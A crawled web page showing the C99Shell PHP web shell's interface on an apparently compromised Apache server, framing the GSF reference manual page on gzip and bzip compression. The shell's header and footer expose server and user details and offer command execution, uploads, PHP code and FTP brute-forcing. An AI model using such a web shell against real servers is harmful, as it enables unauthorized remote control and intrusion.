!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache/2.4.41 (Ubuntu). PHP/8.0.30 

uname -a: Linux apirnd 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/usr/share/doc/libgsf-1-dev/html/gsf/   drwxr-xr-x
Free 13.4 GB of 57.97 GB (23.12%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     gsf-Compression.html (17.98 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
Compression: GSF Reference Manual

Compression

Compression

Properties

gboolean raw Read / Write / Construct Only
GsfInput * source Read / Write / Construct Only
gint64 uncompressed-size Read / Write / Construct Only
gboolean raw Read / Write / Construct Only
GsfOutput * sink Read / Write / Construct Only

Types and Values

Object Hierarchy

    GObject
    ├── GsfInput
       ╰── GsfInputGZip
    ╰── GsfOutput
        ├── GsfOutputBzip
        ╰── GsfOutputGZip

Description

Functions

gsf_input_gzip_new ()

GsfInput *
gsf_input_gzip_new (GsfInput *source,
                    GError **err);

Adds a reference to source .

Parameters

source

The underlying data source.

 

err

place to store a GError if anything goes wrong.

[allow-none]

Returns

a new file or NULL.


gsf_input_memory_new_from_bzip ()

GsfInput *
gsf_input_memory_new_from_bzip (GsfInput *source,
                                GError **err);

Parameters

source

a GsfInput

 

err

place to store a GError if anything goes wrong.

[allow-none]

Returns

a new GsfInputMemory or NULL.


gsf_output_gzip_new ()

GsfOutput *
gsf_output_gzip_new (GsfOutput *sink,
                     GError **err);

Adds a reference to sink .

Parameters

sink

The underlying data source.

 

err

optionally NULL.

 

Returns

a new file or NULL.


gsf_output_bzip_new ()

GsfOutput *
gsf_output_bzip_new (GsfOutput *sink,
                     GError **err);

Adds a reference to sink .

Parameters

sink

The underlying data source.

 

err

optionally NULL.

 

Returns

a new file or NULL.

Types and Values

GsfInputGZip

typedef struct _GsfInputGZip GsfInputGZip;

GsfOutputGZip

typedef struct _GsfOutputGZip GsfOutputGZip;

GsfOutputBzip

typedef struct _GsfOutputBzip GsfOutputBzip;

Property Details

The “raw” property

  “raw”                      gboolean

Whether to read compressed data with no header and no trailer.

Owner: GsfInputGZip

Flags: Read / Write / Construct Only

Default value: FALSE


The “source” property

  “source”                   GsfInput *

Where the compressed data comes from.

Owner: GsfInputGZip

Flags: Read / Write / Construct Only


The “uncompressed-size” property

  “uncompressed-size”        gint64

The source's uncompressed size.

Owner: GsfInputGZip

Flags: Read / Write / Construct Only

Allowed values: >= -1

Default value: -1


The “raw” property

  “raw”                      gboolean

Whether to write compressed data with no header/tailer.

Owner: GsfOutputGZip

Flags: Read / Write / Construct Only

Default value: FALSE


The “sink” property

  “sink”                     GsfOutput *

Where the compressed data is written.

Owner: GsfOutputGZip

Flags: Read / Write / Construct Only


:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0073 ]--